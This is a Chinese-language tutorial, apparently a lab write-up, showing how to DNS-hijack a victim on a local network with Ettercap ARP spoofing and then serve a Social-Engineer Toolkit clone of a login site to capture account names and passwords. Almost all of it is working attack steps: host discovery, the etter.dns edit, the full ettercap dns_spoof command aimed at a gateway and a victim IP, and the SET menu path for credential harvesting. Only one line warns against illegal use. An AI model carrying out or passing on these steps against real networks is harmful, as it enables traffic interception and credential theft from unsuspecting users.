受害主机IP:192.168.20.236
攻击主机IP:192.168.20.164
网关:192.168.21.254
若攻击主机kali是虚拟机,需保证虚拟机的kali是桥接模式
收集信息阶段
获取到本机IP地址
ip address
获取到网关地址
route -n
获取内网同网段下正在联网的所有电脑IP地址
fping -g 192.168.20.0/23
实施攻击阶段
使用Ettercap中间人攻击工具修改dns域名指向
vim /etc/ettercap/etter.dns
按i进入插入模式
esc+:wq退出并保存
接下来使用apache2开启一个web服务
首先备份WEB服务器根目录原html文件
sudo cp /var/www/html/index.html /var/www/html/index_backup.html
然后修改原html文件源码
sudo vim /var/www/html/index.html
删除所有内容命令为:ggdG,其中,gg为跳转到文件首行;dG为删除光标所在行以及其下所有行的内容;再细讲,d为删除,G为跳转到文件末尾行;
删除完所有内容后,复制写好的html源码插入文件中
(按Shift+insert键将复制的源码粘贴进去)
然后输入:wq代表写入并退出
随后输入以下命令重启apache2服务
sudo /etc/init.d/apache2 restart
在浏览器输入攻击机kali的IP地址(192.168.20.164)就能看到之前写好的html源码的效果
输入以下参数对受害主机192.168.20.236进行DNS劫持
ettercap -TqM ARP:remote -P dns_spoof /192.168.21.254// /192.168.20.236//
-i:指定网卡,一般默认为 eth0
-T:仅使用文本 GUI
-q:启动安静模式(不回显的意思)
-M:执行中间人攻击
ARP:remote:使用远程嗅探
-P:指定插件
第一个IP为网关地址,第二个IP为受害者主机IP地址
此时受害者访问任何的http网站都会显示被黑
爱奇艺首页
腾讯首页
百度首页
在攻击者主机kali的终端可以看到攻击者主机kali将受害者主机请求的所有http网站都通过Ettercap解析到了自己的web服务器(192.168.20.164)
由此我们得到一个思路,既然受害者访问的网站可以被我们所控制,那么我们是否可以控制一个仿制网站回显给受害者,然后受害者输入账号密码后,我们可以达到截取账号密码的目的
进一步实践,用 SET(Social-Engineer Toolkit)+Ettercap 进行钓鱼攻击
参考上文修改dns劫持文件中的域名指向为受害者主机需要登录的站点链接(这里对域名进行脱敏处理,若需实践请自行搭建站点测试,勿用于非法用途)
vim /etc/ettercap/etter.dns
Social-Engineer Toolkit是一个基于python语言开发的社会工程学工具,主要用来进行社工攻击,包括钓鱼网站,无线 AP 攻击,QRCode 攻击。
在攻击机kali终端中输入setoolkit即可启动setoolkit,启动后有可能会要求你同意一个安全条款:
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.
选择y同意并进入下一步,到主界面
输入1并回车,开始社会工程学攻击
然后,选择菜单中第二个选项,网站攻击。
选择第三个选项,窃取凭证。
选择2,网站克隆
这里直接按回车键,使用默认IP,即是攻击者主机kali自己的IP(192.168.20.164)
输入要克隆的站点链接
当提示:
[]Cloning the website: http://www.xxx.com/
[]This could take a little bit…
的时候,我们需要等待一会儿,然后提示:
The best way to use this attack is if username and password form Fields are available. Regardless, this captures all POSTs on a website.
[]You may need to copy /var/www/ into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we’re saying here.
的时候,我们再按回车,就可以看到提示网站已经克隆成功,可以运行在攻击者主机IP下的80端口,这里提示我之前开启的apache2的WEB服务占用了80端口,需要我关闭,这里我们输入y确认关闭
然后显示钓鱼网站就绪
这时候,在浏览器输入攻击机kali的IP地址(192.168.20.164)就能看到就可以看到网站已经完成克隆。
跟上文一样,输入以下命令,对受害者主机(192.168.20.236)发起DNS劫持攻击,使得受害者访问真实网站的时候被劫持到钓鱼网站。
ettercap -TqM ARP:remote -P dns_spoof /192.168.21.254// /192.168.20.236//
当受害者访问真实的网站的时候,则会被攻击者主机kali解析到仿制的钓鱼网站界面
ping一下受害者访问的真实主机域名,可以得知真实主机域名已被攻击者劫持为自己的IP,同时这里暴露了攻击者的IP地址,留下了攻击痕迹
ping www.xxx.com
受害者在钓鱼网站输入账号密码后,账号密码作为请求参数显示在攻击者kali的setoolkit终端
